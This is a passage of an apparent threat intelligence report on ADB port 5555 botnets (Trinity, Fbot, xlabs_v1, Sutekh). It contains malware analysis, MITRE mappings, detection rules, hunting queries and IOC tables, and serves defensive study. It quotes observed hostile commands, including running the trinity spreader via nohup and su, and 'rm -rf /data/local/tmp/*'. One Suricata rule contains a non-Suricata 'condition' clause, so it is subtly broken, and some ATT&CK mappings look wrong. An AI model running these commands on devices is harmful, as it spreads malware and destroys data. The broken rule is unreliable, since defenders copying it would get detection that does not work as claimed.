*   **Censys, Inc. (AS398324 / AS398705):** Multiple IPs (e.g., `66.132.172.16`, `167.94.145.42`) conducting generic protocol decoding.
*   **Hurricane Electric (AS6939):** While some HE IPs may be malicious, many are used by security companies routing traffic for reconnaissance.

---

## 4. Malware Analysis and Family Attribution

The dataset includes 72 dropped file hashes. Through behavioral analysis and cross-referencing with global threat intelligence, these payloads can be attributed to distinct malware families engaged in an active conflict for device supremacy [cite: 4, 11].

### 4.1 The Trinity Cryptojacking Botnet
Trinity (also tracked as `com.ufo.miner` or `HiddenMiner`) is a highly aggressive, peer-to-peer Android botnet whose primary objective is to hijack the CPU resources of ARM-based devices to mine Monero (XMR) cryptocurrency [cite: 3, 11]. It is considered an evolutionary successor to the older ADB.Miner malware [cite: 11, 12].

#### 4.1.1 Trinity Execution Chain
Trinity's infection mechanism relies on a sophisticated suite of tools [cite: 1, 4]:
1.  **The Dropper (`ufo.apk`):** This is the core Android application package. Upon delivery via ADB, it is installed (`pm install`). The APK is designed to aggressively request device administrator privileges, hide its launcher icon to evade user detection, and suppress the operating system's thermal warning notifications to prevent the user from noticing the device overheating due to cryptomining [cite: 10].
    *   *Known Dropper Hashes:* `0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257` [cite: 4, 13].
2.  **The Spreader (`trinity`):** A compiled ARM ELF binary. Once executed, `trinity` takes over the victim device's network stack, generating random IP addresses and scanning them on TCP port 5555. When a vulnerable device is found, it automatically pushes the Trinity toolkit to the new victim, creating a self-sustaining P2P worm [cite: 1, 4].
    *   *Known Spreader Hashes:* `71ecfb7bbc015b2b192c05f726468b6f08fcc804c093c718b950e688cc414af5`, `76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64`, `a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437` [cite: 1, 4].
3.  **Persistence (`nohup`):** The attackers explicitly push a precompiled ARM version of the Linux `nohup` (no hangup) utility. This ensures that the miner and spreader binaries continue to run in the background even after the ADB shell session is terminated by the attacker [cite: 4].
    *   *Known Nohup Hash:* `d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0` [cite: 4].

#### 4.1.2 Observed Telemetry Commands
The dataset is rife with Trinity executions originating from compromised Asian telecommunications IPs:
*   `/data/local/tmp/nohup /data/local/tmp/trinity`
*   `/data/local/tmp/nohup su -c /data/local/tmp/trinity`
*   `am start -n com.ufo.miner/com.example.test.MainActivity` [cite: 1, 14]

### 4.2 Fbot: The Vigilante Assassin
Fbot is a fascinating anomaly in the IoT threat landscape. It is a derivative of the infamous Mirai botnet (specifically sharing code with the Satori variant) [cite: 11, 15]. However, unlike traditional Mirai variants that focus solely on DDoS, Fbot's primary observed function is "assassination." Its objective is to hunt down, terminate, and replace the Trinity botnet [cite: 4, 12, 16].

#### 4.2.1 The Motive
While some early analysts speculated Fbot might be a "white-hat" vigilante worm designed to clean up the internet [cite: 15], the reality is rooted in cybercriminal economics. Cryptomining malware like Trinity monopolizes the CPU and network resources of an infected device. A DDoS operator needs those exact same resources to launch volumetric network floods. Therefore, Fbot's operators engineered their malware to violently evict the competition [cite: 4].

#### 4.2.2 Fbot Execution and "Cleaning" Chain
When Fbot breaches a device via ADB, it initiates a ruthless cleanup script:
1.  **Process Termination:** Fbot scans the `/proc/pid/exe` memory maps of all running processes looking for known Trinity and cryptomining signatures, such as `SMI`, `Xig`, `rig`, and `com.ufo.miner`. If found, it issues a `kill` command to terminate them [cite: 12, 17, 18].
2.  **File Deletion:** Fbot executes aggressive deletion commands, such as `rm -rf /data/local/tmp/*`, effectively wiping out Trinity's binaries (`ufo.apk`, `trinity`, `nohup`) from the device's temporary storage [cite: 4, 12].
3.  **Application Uninstallation:** Fbot attempts to use the Android package manager (`pm uninstall`) to completely remove the Trinity application [cite: 4, 12].

#### 4.2.3 The Blockchain C2 Evasion (EmerDNS)
What makes Fbot technically remarkable is its Command and Control (C2) infrastructure. To prevent law enforcement from seizing or "sinkholing" its C2 domains via ICANN, Fbot utilizes a decentralized, blockchain-based Domain Name System called EmerDNS [cite: 12, 19].
*   Fbot reaches out to the domain `musl.lib` on port 7000 [cite: 12, 19].
*   Because `.lib` is not a standard Top-Level Domain (TLD), traditional security appliances and DNS resolvers fail to block it. The malware relies on specific OpenNIC or EmerDNS resolvers to find its C2 IP address (historically located in Singapore) [cite: 12, 15, 19].

### 4.3 xlabs_v1: The Commercial DDoS-for-Hire Platform
The most recent and concerning evolution in ADB exploitation is the emergence of `xlabs_v1`. Discovered in early 2026, xlabs_v1 is a commercialized, Mirai-derived botnet specifically tailored to hijack Android TV boxes and routers for deployment in DDoS-for-hire (booter/stresser) services [cite: 20, 21, 22].

#### 4.3.1 Capabilities and Targets
The operator behind xlabs_v1, operating under the pseudonym "Tadashi," has built a platform optimized for attacking gaming infrastructure [cite: 7, 20].
*   **Attack Vectors:** The botnet supports 21 distinct flooding variants across TCP, UDP, and raw sockets. Notably, it includes `RakNet` floods (specifically targeting Minecraft servers) and `OpenVPN`-shaped UDP floods designed to blend in with legitimate traffic and bypass consumer-grade DDoS mitigation hardware [cite: 7, 21].
*   **Bandwidth Tiering:** In a display of commercial sophistication, xlabs_v1 performs automated bandwidth profiling on newly infected devices. It secretly opens 8,192 parallel TCP connections to a Speedtest server to measure the device's upload capacity. The operator then uses this data to group bots into pricing tiers, charging their illicit customers a premium for access to high-bandwidth nodes [cite: 7, 21].
*   **Cross-Architecture Support:** The payload is delivered as an Android APK (`boot.apk`) or as statically linked ELF binaries for ARM, MIPS, x86-64, and ARC architectures, ensuring maximum compatibility across the diverse IoT ecosystem [cite: 20, 21].

#### 4.3.2 xlabs_v1 Infrastructure
Threat intelligence confirms that the xlabs_v1 staging infrastructure and operator panels (`xlabslover.lol`) are heavily concentrated within the Offshore LC (AS214472) bulletproof network [cite: 6, 7].
*   The IP `176.65.139.44` was identified as a primary staging server containing the xlabs_v1 attack capture file manager [cite: 6, 20].
*   Like Fbot, xlabs_v1 also contains a "killer" module designed to hunt down and terminate rival botnets, ensuring exclusive access to the device's network interface [cite: 7, 21].

### 4.4 Sutekh and Obscure Variants
The dataset also contains evidence of lesser-known or emerging malware strains exploiting ADB.
*   **Sutekh:** An attacker IP (`194.127.167.122`) originating from EE (Owl Limited) was observed executing `rm -f '/data/local/tmp/.sutekh.apk' 2>/dev/null`. This command attempts to clean up a previous installation of the "Sutekh" payload, associated with the hash `0dcf714e673750914e631f21abeb2dc58f034757b1896070fdbe027e4a58e416`. Sutekh appears to be another IoT botnet variant relying on standard shell scripts (`cat.sh`) pulled from bulletproof hosts [cite: 23, 24, 25].

---

## 5. Campaign Attribution and Ecosystem Dynamics

The events recorded in May 2026 do not represent a single, unified attack. Instead, they illustrate a chaotic, multi-front cyberwar characterized by three distinct campaigns.

### 5.1 Campaign A: The Trinity Expansion
**Actor:** Trinity/HiddenMiner Operators
**Objective:** Resource Hijacking (Cryptomining)
**Modus Operandi:** A decentralized, shotgun-approach P2P worm. As soon as a device in Asia (e.g., China Telecom) is infected, it is immediately instructed to blindly scan the IPv4 space for TCP 5555. Upon finding an open port, it pushes the `ufo.apk` and `trinity` ARM binaries. The goal is to maximize the hash rate for Monero mining, disregarding the device's thermal limits or network stability [cite: 4, 26].

### 5.2 Campaign B: The Fbot Clean-Up
**Actor:** Fbot/Satori Operators
**Objective:** Botnet Supremacy and DDoS Capability
**Modus Operandi:** Fbot actively monitors the same IP ranges as Trinity. When it breaches a device, its priority is not immediate monetization, but territorial control. It surgically removes the Trinity installation, patches the vulnerability if possible, and connects to the decentralized EmerDNS C2 (`musl.lib`). Fbot waits dormant until called upon to launch a volumetric DDoS attack [cite: 4, 11, 12].

### 5.3 Campaign C: The xlabs_v1 Commercialization
**Actor:** "Tadashi" (xlabs_v1 Operator)
**Objective:** Monetization via DDoS-for-Hire (Booter/Stresser services)
**Modus Operandi:** Utilizing heavily fortified bulletproof infrastructure (Offshore LC in the Netherlands), xlabs_v1 targets the exact same devices. It profiles their bandwidth to maximize profit margins and leverages highly specific application-layer floods (RakNet) to take down gaming servers for paying customers. This represents the professionalization of the ADB attack surface [cite: 7, 20, 21].

---

## 6. MITRE ATT&CK Framework Mapping

The behaviors exhibited by these botnets can be systematically categorized using the MITRE ATT&CK framework for Enterprise and Mobile matrices.

| Tactic | Technique | ID | Description / Observation |
| :--- | :--- | :--- | :--- |
| **Initial Access** | Exploit Public-Facing Application | T1190 | Exploitation of unauthenticated ADB service exposed on TCP port 5555 over the internet. |
| **Execution** | Command and Scripting Interpreter | T1059.004 | Use of `adb shell` to execute Unix shell commands (`wget`, `curl`, `chmod`, `sh`). |
| **Execution** | Native API | T1106 | Use of Android native commands like `am start -n` to launch specific application activities (e.g., `com.example.test.MainActivity`). |
| **Persistence** | Hide Artifacts | T1564.001 | Hiding the launcher icon of the malicious APK (`ufo.apk`) to prevent user deletion. |
| **Persistence** | Systemd Service / Background Process | T1543 / T1037 | Use of the `nohup` utility to ensure binaries (`trinity`) survive shell termination. |
| **Privilege Escalation**| Exploitation for Privilege Escalation| T1068 | `ufo.apk` aggressively requests Device Administrator privileges upon installation. |
| **Defense Evasion** | File Deletion | T1070.004 | Fbot executing `rm -rf /data/local/tmp/*` to remove forensic evidence and competitor malware. |
| **Defense Evasion** | Impair Defenses | T1562.001 | Fbot executing `pkill` to terminate rival cryptomining processes (`SMI`, `Xig`). Suppressing thermal warnings. |
| **Discovery** | Network Service Scanning | T1046 | Infected devices autonomously scanning the internet for other devices exposing port 5555. |
| **Discovery** | Process Discovery | T1057 | Searching `/proc/[pid]/maps` for competitor malware file names. |
| **Command and Control**| Application Layer Protocol | T1071.001 | Fbot utilizing EmerDNS (blockchain DNS) to resolve the `.lib` C2 domain. |
| **Impact** | Resource Hijacking | T1496 | Trinity utilizing XMRig to mine Monero, consuming massive CPU cycles. |
| **Impact** | Endpoint Denial of Service | T1498 | xlabs_v1 and Fbot executing volumetric TCP/UDP/RakNet floods against external targets. |

---

## 7. Detection, Mitigation, and Response Strategies

Defending against the ADB botnet ecosystem requires a multi-layered approach involving edge filtering, network intrusion detection, and proactive threat hunting.

### 7.1 Edge Firewall Mitigation
The most effective mitigation is an absolute block of inbound TCP port 5555 at the perimeter firewall. ADB is a local debugging protocol and has absolutely no legitimate business requirement to be exposed to the Wide Area Network (WAN) [cite: 11, 15].
*   **Rule:** `DROP TCP ANY -> <WAN_IP_RANGE> PORT 5555`

For organizations dealing with remote Android development, ADB should only be accessed via a secure, authenticated VPN tunnel, or explicitly whitelisted to specific developer IP addresses.

### 7.2 Network Intrusion Detection (IDS/IPS)
If port 5555 must remain open internally, or for monitoring purposes, Snort or Suricata signatures can detect the initial handshake of an ADB connection and subsequent malicious commands [cite: 17].

**Suricata Rule: Detect ADB TCP Handshake (CNXN)**
```suricata
alert tcp $EXTERNAL_NET any -> $HOME_NET 5555 (msg:"ET EXPLOIT Possible Android Debug Bridge (ADB) TCP Connection Attempt"; flow:established,to_server; content:"CNXN"; depth:4; classtype:attempted-admin; sid:1000001; rev:1;)
```

**Suricata Rule: Detect Common IoT Botnet Payload Delivery**
```suricata
alert tcp $HOME_NET 5555 -> $EXTERNAL_NET any (msg:"ET MALWARE Suspicious wget/curl in ADB Shell (Mirai/Trinity)"; flow:established,from_server; content:"wget "; content:"curl "; content:"chmod 7"; content:"/data/local/tmp"; condition: "any of them"; classtype:trojan-activity; sid:1000002; rev:1;)
```

### 7.3 SIEM Hunting Queries (Splunk / KQL)
Security Operations Centers (SOCs) should actively hunt for signs of successful ADB exploitation or subsequent outbound scanning (indicating the device has become a P2P node).

**Splunk: Detect Outbound Scanning from Internal Devices**
```splunk
index=firewall dest_port=5555 action=allowed src_ip IN (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)
| stats count by src_ip, dest_ip
| where count > 50
| rename src_ip as "Compromised Internal Device", count as "Scan Attempts"
```

**KQL (Microsoft Sentinel): Detect Bulletproof Hosting Interaction**
```kql
let BulletproofASNs = dynamic(["AS214472", "AS210558", "AS209605"]); // Offshore LC, 1337 Services, UAB Host
DeviceNetworkEvents
| where RemotePort == 5555
| extend RemoteASN = tostring(parse_json(AdditionalFields).ASN)
| where RemoteASN in (BulletproofASNs)
| project Timestamp, DeviceName, RemoteIP, RemoteASN, ActionType
```

### 7.4 Endpoint Remediation
For Android devices suspected of infection:
1.  Disconnect the device from the network immediately.
2.  Attempt to reboot the device into Safe Mode (which prevents third-party apps like `ufo.apk` from starting) [cite: 2].
3.  Access the device locally via USB and execute `adb uninstall com.ufo.miner` [cite: 2].
4.  If the malware has established deep persistence, a complete factory reset of the Android device is the only guaranteed method to clear the payload [cite: 17].
5.  Upon reboot, immediately navigate to Developer Options and ensure "ADB (Wireless) debugging" is disabled [cite: 17].

---

## 8. Conclusion

The data extracted from the May 2026 ADBHoney telemetry provides a stark illustration of the vulnerability inherent in the Internet of Things. TCP port 5555 represents a critical failure in secure-by-default engineering practices. Threat actors have recognized this, turning thousands of consumer devices into a sprawling, weaponized infrastructure.

The landscape is not a monolith, but a battlefield. Cryptomining operations like Trinity seek to drain resources for financial gain, while DDoS mercenaries operating xlabs_v1 and Fbot seek to commandeer those same resources to launch devastating network floods. This entire ecosystem is heavily subsidized by the complicity of bulletproof hosting providers like Offshore LC, who provide the unassailable staging ground required to store the attack tools. Until manufacturers enforce strict authentication by default, and until ISPs take stronger action against blatantly malicious ASNs, the ADB port will remain a primary vector for IoT botnet propagation.

---

## 9. IOC Appendix

### 9.1 High-Priority Attacking IPs

| IP Address | ASN / Org | Country | Classification | Associated Threat / Activity |
| :--- | :--- | :--- | :--- | :--- |
| `176.65.139.140` | AS214472 (Offshore LC) | LU | Bulletproof Host / Staging | Massive delivery (1411 events) of `cat.sh` via wget. |
| `176.65.139.188` | AS214472 (Offshore LC) | LU | Bulletproof Host / C2 | Delivering `android.sh` (1050 events). Associated with xlabs_v1 infrastructure. |
| `45.154.98.199` | AS210558 (1337 Services GmbH) | NL | Bulletproof Host / RDP | Executing complex directory traversal and `run.sh` downloads. |
| `130.12.180.65` | AS202412 (Omegatech LTD) | NL | Malicious Host | High volume (1888 events) of malicious protocol decodes. |
| `218.205.95.160` | AS56041 (China Mobile) | CN | Compromised Residential P2P | Trinity Spreader executing `/data/local/tmp/trinity`. |
| `1.31.31.7` | AS4837 (China Unicom) | CN | Compromised Residential P2P | Executing `/data/local/tmp/log`. |
| `119.247.97.228` | AS9269 (HK Broadband) | HK | Compromised Residential / Fbot | Executing Fbot cleanup routines `rm -rf /data/local/tmp/*`. |
| `194.127.167.122` | AS43357 (Owl Limited) | EE | Malicious Host | Delivering the `Sutekh` botnet payload. |

### 9.2 Critical Malware Hashes

| SHA-256 Hash | File Type / Name | Malware Family | Context / Behavior |
| :--- | :--- | :--- | :--- |
| `0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257` | APK (`ufo.apk`) | Trinity / HiddenMiner | Core cryptomining dropper. Requests admin rights, hides icon. |
| `71ecfb7bbc015b2b192c05f726468b6f08fcc804c093c718b950e688cc414af5` | ELF (`trinity`) | Trinity | Core P2P spreader module. Scans port 5555. |
| `d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0` | ELF (`nohup`) | Utility | Precompiled ARM binary used by Trinity for persistence. |
| `0dcf714e673750914e631f21abeb2dc58f034757b1896070fdbe027e4a58e416` | Script/APK | Sutekh | Competitor botnet payload, cleaned up via `rm -f`. |
| `26e72314a3c85dcd726ce1119d35279cb252d296cbe95504addd948ad32da9cc` | Script (`cat.sh`) | Downloader | Dropper script utilized by multiple botnets for initial staging. |
| `6ad3c27482709fcd52f9b9f25b37ce4fbcba59422f3bb4fd2d0f7624b113b7c3` | Script (`android.sh`) | Downloader | Secondary staging script pulled from bulletproof infrastructure. |
| `608ee011537005f368c9731f4c4dee6a247b620cde52908ed0678df28c617971` | ELF (`log`) | Trinity Variant | Dropper executed alongside nohup by infected Chinese P2P nodes. |

---

## 10. Sources and Citations

The following sources were referenced and synthesized in the creation of this threat intelligence report:

*   [cite: 4]: NadSec Online, "adbhoney" Threat Landscape Report (April 2026). Details on Trinity botnet, Fbot vigilante activities, and bulletproof ASNs (Offshore LC, UAB Host Baltic).
*   [cite: 6, 7]: Hunt.io and Cyberpress, "xlabs_v1 DDoS-for-hire operation exposed" (April/May 2026). Analysis of the xlabs_v1 botnet targeting Minecraft servers, bandwidth profiling, and staging on Offshore LC.
*   [cite: 3, 11, 17]: ZDNet, QuickHeal, TrendMicro (2018-2019). Historical context on the initial turf war between Trinity (com.ufo.miner) and Fbot over ADB port 5555.
*   [cite: 1]: Keysight Technologies, "Trinity/P2P Malware over ADB" (2020). Technical breakdown of the ADB protocol, unauthenticated TCP/IP vulnerabilities, and the `trinity` spreader mechanics.
*   [cite: 10]: NadSec Online, "tpotsyd" Sensor Data (2026). Analysis of Trinity (HiddenMiner) pushing `ufo.apk` and the classification of compromised Asian telecommunications networks as residential P2P nodes.
*   [cite: 13]: BlackAlps Presentation by Axelle Apvrille (2018). Contextualization of Android cryptojacking malware and the Trinity botnet hashes (`0d3c687ffc30...`).
*   [cite: 26]: QuickHeal, "Trinity Miner using open ADB port" (2019). Detailed IOCs and execution chains for the Trinity botnet.
*   [cite: 12, 19]: Netlab 360 and SC Media (2018). Discovery of Fbot utilizing EmerDNS (`musl.lib`) and its behavior of actively killing the `com.ufo.miner` botnet.
*   [cite: 23, 24, 25]: ResearchGate and GitHub references to the "Sutekh" malware and generic IoT botnet threat modeling.
*   [cite: 5, 8, 9]: DecodeCybercrime, Okta, and BitSight (2026). Threat intelligence on "1337 Services GmbH" acting as a bulletproof RDP and malware hosting provider.
*   [cite: 15, 16]: Zimperium and NHS Digital (2018). Fbot remediation strategies and validation of its anti-cryptominer behavior.
*   [cite: 2]: Wikipedia, "Android Debug Bridge". Foundational information on the ADB architecture and historical botnet abuse.
*   [cite: 20, 21]: The Hacker News and WeSpeakIoT (May 2026). Latest reporting on the xlabs_v1 botnet leveraging ADB for DDoS attacks and its RakNet flooding capabilities.

**Sources:**
1. [keysight.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGEzb2HgiO6xRPz8eVLtbfsjILbNh_31Immcs9XGX1vZQqHOU3n7V6PVUUkOL8AM-IhtmDvgAPeDzAEPpUsYB5LDG9le_Q2aLp0hkwnZZLOgzzaTDBhPKaJ6JVWXlv1zH3ByvhwORNT2n1CH09r8OlQ4GnwNRveHIttLYk6_uYuzCOd1eyGowYi)
2. [wikipedia.org](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGa6fF7VquelNnu6vqoinaJ9WGOzjIuq-WwMIO3i-leaVgVRu9synAZZaj-M7Gl4r5MoT01xesC8xi-VZLunFmbcCLn58fePo9XQLLGQ5gYL9HvxQVk-9PJ7X50E5GLJ4F_hzxyvnwPeA==)
3. [quickheal.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHjpvUdZ4BlsM7KDuekxirTM44lf8y8agoGvuutPJ8iwOWzi50CCpuBOBXnfBRWqFA1Z72vgw5wot0kwjB6k0wcNPHES9JmVtLor8j7mfdo7InCpC_JvQoiJVcwJOKkZq79Upaco3scGLksnSDqQnmxEvWUJe3e6gKXfkYyhf33yae4XE-YA_TbxZU0jn9pShONE9ZfzI7M_ekWg5omhAynDno=)
4. [nadsec.online](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHgTw-upz2U5DCQRD2dGNnACE_MAusvd2dgkwwykgAN54TTE79RisDVYAz-L6U6_ZRsx5A40kk77P5F-xBqWLOqYazmvxt0pIe9fQPUsvyAV79dTtGqwoFu)
5. [okta.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFAi3oLYETT9TscZ2gBS8qjd9Lx-TSHLj1kfXEX3V4R1eNroL_YHoVAc3_U4_LyeZGtnQwpptKCrr2Wt_QWYeqTfKhhPQuAl7Wsrtu1yJ7wYgnVSb06mV8hcTChVJ--_2PRVcvhFjOzqXF5OMRx6nQnONAW7KjyMQ6Kgxj0CJ4Dyzo=)
6. [hunt.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF5mWQgj0bE5LDxDwofH3b6apQjHVbsIWmUsziY2mdHC3-R2p2pZ9CAy23VlRg3loUUdnm87FGcxNUtZxHsljdFCD-bvMJpsFs2GIkNstWKMmSOQANeSMf1K5CwpvXrzjLvR28CWN4e6hkhWDTgHjUH5a7E)
7. [cyberpress.org](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQELvF7WFnJWzECtZjHADBaH8UXr0tuGu1PSe3EwI8NPDLNZHzWYjtInKgkls780Ex2BAZ_ZG7Sr_7nZ9oXXnxMdY4fvbPPiIQZjuZ4R_Z_50JBMrQj0dGpbZx7D-f384YE6gSkX6EhXeZyi)
8. [decodecybercrime.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHBOU14FkGmdE7r9GAPSuQxk7fc9S2KUrusmiqimGBYK3sRjadHfcLy_G9gtc1cUi0dtPMQFEQw-zNeho9-4hOv04yi6XVaQ0rc2yY25LqHvPOOOr8SVsjEvCngNuckw6uxL4zuplHwaqnJYLuD4x7jNIPjn0s3cSKfv4_CbGzdGLbSQu5LJ59b29qZZFiAn32B4s_CTp3LOdRJXQp8jn_fb8nHs9p9v-eUDCqtDw==)
9. [bitsight.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFkEYoiOEovU8PrGabv0mqFDlvAqeIRh5ib08xH9KwXPlKLSjhcWxqWVHdObKp4LD-hvVi8vrw_GYPEWzpT6W44Z3AIxhBpOm3zme42qm6Ts1g3mXhoz2JF9nNxqmkKIeoNl6UnAmZZM4CxLfd29jKl6Nx05BImMmsJRHA=)
10. [nadsec.online](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFgnPpfRs3vZ8y3Az54OwbfUIgjMkt-ulKrJKkO90mC7Jxd7zgT1zPDYzpEP-lJKU04nSpdZSiPFE18xmZxqkmuAf5CVOh3L4IqbG52aIXwLYG1gNE09GQ=)
11. [zdnet.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGDlG5P9GFTgCKaHICwvXSi89Qt4dwRJquxJXYEpW0LTDAEOofu55VGtVkxq98oW6GF71lbPO_q5vqDHfpJcxf7oJpBM5AjAeDol0Q6ixbS4ppvsei9BdCNDnLxjX993TpwONrOnutDuYDGOOtOn01vBjQ0togDo3ya9wLABly6LEJpBHAE1LCUdtR-6kCdF02FmAEMVxC2OaHwwOxaTSal49CZjw==)
12. [360.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF4Nb1dN_ZgEZhVwrdoXBpWOVXG88v9mCk4MBnz33d1dIUauYPEMYfCToCh3KzYWDlhRTPkHnTu097zkccN74n3-LMILFCHkCBhN9akPzF6zxBm-TfO_O3j28zsiR_riJYZUB20FGMlJ0Z8Q8RGDmApVm-xoW5UlCa6uKSNvJwjgybJZcSSXoalwCT63_2TAScY1IhTVeXpWMYdFodtaVuWo0oNoA==)
13. [blackalps.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQENbijMr4TCWRRb0FaWQhlapRlm4mr9UlCJu_sOqzPNWgpdX2yYSMl8mW2UAg4-28jvxTYZAmBXbqqdNAd2IJXWgcLiMwTFgcPL5bxtcuGz4IBS3VVy8GrFGd23cMxFPf93JYLLCXA-PmsiNqcQJKfEeb7-F_haADKcaAf6D8FBsg==)
14. [github.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG1rBpx7uj0rf_PNrU3aHf8VpshEGW4CLVE0gWYLmm-OtJI_PF8PurOxN9Ztn3N4tpzj6VGQwJ7DbQg2j0mpS6NTGvuIVc1RPNN3qws8m16Igd3Xxm9eHFeghyeQ01FxqgPqgwFcMT57xB13-ql1Br5LY7UBMJ9LeNw1qg=)
15. [zimperium.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHJkBX3j0LDRyeH9B5u3Z29ydxXzf63yBXaNr7kGempaa4TkFqB-AOEJ8wbNOTJyqtnU214BICw_x4zaT-ruirKDjbOpKnQC9TlKSXqTjLtd4KNx6p4py-IVNwoZPO0q8E=)
16. [digital.nhs.uk](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEQfBDqsUifq6A00TWTH9vzHpOmjK90nDKJNnVecwA254OsVf2SX42LUyGZUXYmFVqVS6Z0YPYA_KndOH8BfE4BHqSb-mlXEpXzMGeVMZOSl7RphYLfFyU3zBDfJsBx-I55XhUf6DY=)
17. [trendmicro.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEiqjuBpQrnKSSeXCU9AhrGI3C8ucYbETIjEtuuFVoR7qWKBDdMPHm2BpNzj5CJ1GaoKoB5eifYN5HFjXv55ucsPxBB0mX_Mrs9kvPlu08iZbLhN86-NeJ2N6tWBAC7P8cdsGWBsTHDBLgzp6JiMtoCXlhv1tWtqpZiQAPj0waV8cEeywmaYsoN1pYj0bdmREWxXMlhNe5N2r--vlVcHWPYtLB5kNRMwp31qJlo7Y5CtFvkUB8XumIRXXsMBreq)
18. [cyware.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF5pbaLdWyn7s5eCyhcnimYkVRocoQwTg6lpNED0qQW5P834vb_g6jgeeXL2C4wCNvOV0yPTLKg7AFUNl6BMHsNfC3gAgrbyTjmgbFR5Xgz_I5UDlLEh2Kd2GbfXdeWU4UcKhx-ErMc0SkQ2lN8NqVOXfW45PaxNbrnCftR9bkwOjmAsUbktpGWLeSBocOezs12jKDYf0YsvlVltRCiFqgg4bFqRjChoxWbIdw3QVKI)
19. [scworld.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQE2Z3XAfZAKB_AM02eEHFg6m70U466kjHI2V4gY0EgpxcwCHTUERKag3QXwXxJPBP5oXmAWwRF-MC8vGzVgbHjQTOQShCopIyrpc72U1asEsmCbSnnYXa7MY1YSyHPqnDGUHksGqO0CtMU2nba1ODOwYzcrXb-z3ZDRH09ilD0Yzv-PNSaf9fYOrKa6thizZTX2CHJ3TNc5ECMLvw==)
20. [thehackernews.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG3aQ73cim3sTdGspyp3fP8nOGIP3WVr015WSt5jOTn5FTdoiFYgCgT5zWAwFEI0YCPA1ke_Jn3jCtE6bR6ybCTkCUxaM4GFPd_fc-7ly0IAVDiY4EM20VQ4rq0lQkVFDGTXaxuy6NLT3CGIa9ATE38jJsQndP3NpyL-2vR1QZqnwBp_vM=)
21. [wespeakiot.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEEM4i1y0-5BH1dlcItWDFMFgW2GHb6iYvWog2OHDsN20aEIC6GT6Na_lt-hfOGDcA8NQDEhAjHLi6owh4GWyOCtsddfLh5NDAQ7-NQumZXoaZ-7uxAEeyJvfNXrYPuHs7KteFE7Quu15u2JMawY4PiWk6Y-zcvY9IYXJJK-Qt-1OitH2snkR4bb99kyiK93rKNmuwfkOiJsis=)
22. [innovatecybersecurity.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHyj0wzGNKH6yCPgBeY7o3TZSh7E2PTk5oMbAsHQ4jR3oDK3EZ23KF25TpUyH2v1LHEHv5X8UcMGl0fK52QAN-atTvxNUyZY2JPhrLfJohIZSjuP_0Fsr5dYHrfOlj7ZyIMPA2rHev--p5weo_tUWaDC4BwevRfo1Z2JQcM9Bi_f3mm_N_gR9ZMIlhfcQNleXkMivn5h44l4xchA7YuKIcIVQr-9JT5qVgWt4qxvteqKwCyVvjFNt0UJ76wAjNIsHz6QjPnhOvUbhuSZxCaVTof3gUq1zHVa9aT0p2pzQUViujodfJU4pb7XWdDYwvUb1JAGT1xeXOC6DMinS1usPC6vHMHXVpOEDwucShSgxVYqCFN9qYo7pjK2eSrxRUaMmPcDaMgVQK2lCXUstvBGxjVb3Tdy7A0)
23. [researchgate.net](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHRkt4L0PnaMHnoL43FTIDzjBqQNg0A3hUxTWgv4KrPfEV9OP9ghwvr5qHCL-KdrG5-xCKJnoDTGW7CXWN6SOb7C4DD7xYyJ7VUIOgOyUK4l0a3Pd3mVDZYmv2VRjOoMp5fu396gBnU9M4b8R2-sjbaUG3_knzchTVjVj3m918q2MMylPHMyAYeuojkA6PPVVMU4g4w2Y0Yqg==)
24. [technadu.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH29MSko53moEpS2IqatlWOM0IKJfXAp8P6389PJW8GvJAK9sJJUZnCOsEeLYHtYBrrLy4d3WuvJ-U3EmKKRFF4hQTh-ZXGOnZ_mf9z0KHOMG4xx_PDvq8hrraSJkJA5kf6ppeDzlslw8cv9HzOkryIJzZuDFlB35XTHxvJKMCv3u3FoJ-u-tjj5q2juuPUJHhkHhjMH8OhHuNuOu3Qr3xGuYQhina-b_rK0kouAqmrBUl5AWeba1QUJr_vgA==)
25. [github.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEVT3kTcpE3F5x6dA2kBMvDoc7m9EpK-suYBl8Hkrb6M80yYoTNWrzBniurbNRphYBZ7aC4ShpveFGoklyzLDaahAx38sgYukRE23cp8iVjn7FlpofoqgvqcfDWw40=)
